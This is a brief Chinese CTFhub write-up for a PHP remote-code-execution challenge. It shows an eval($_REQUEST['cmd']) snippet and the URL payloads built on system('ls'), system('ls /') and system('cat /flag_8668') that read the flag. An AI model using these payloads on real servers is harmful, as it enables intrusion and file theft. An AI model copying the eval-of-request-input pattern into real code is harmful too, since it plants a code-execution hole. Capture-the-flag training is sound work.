CTFhub-RCE-evel执行

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
墨痕诉清风2 分钟前
Web浏览器客户端检测网站网络健康(代码)
前端·网络·测试工具
IMPYLH5 分钟前
Linux 的 wc 命令
linux·运维·服务器·前端·bash
小短腿的代码世界6 分钟前
Qt国际化深度解析:从源码到企业级多语言实践
java·数据库·qt
凌冰_15 分钟前
IDEA 集成Claude Code
java·ide
SXJR17 分钟前
Java中的Cross-Encoder模型解决方案
java·开发语言
happybasic21 分钟前
Python库升级标准流程~
linux·前端·python
彦为君26 分钟前
JavaSE-11-BIO/NIO/AIO(多人聊天室)
java·开发语言·python·ai·nio
川冰ICE27 分钟前
前端工程化深度实战:从Webpack5到Vite5的构建工具演进与选型决策
前端
CDwenhuohuo28 分钟前
优惠券组件直接用 uview plus
前端·javascript·vue.js
计算机安禾34 分钟前
【c++面向对象编程】第43篇:可变参数模板(C++11):优雅处理不定长参数
java·开发语言·c++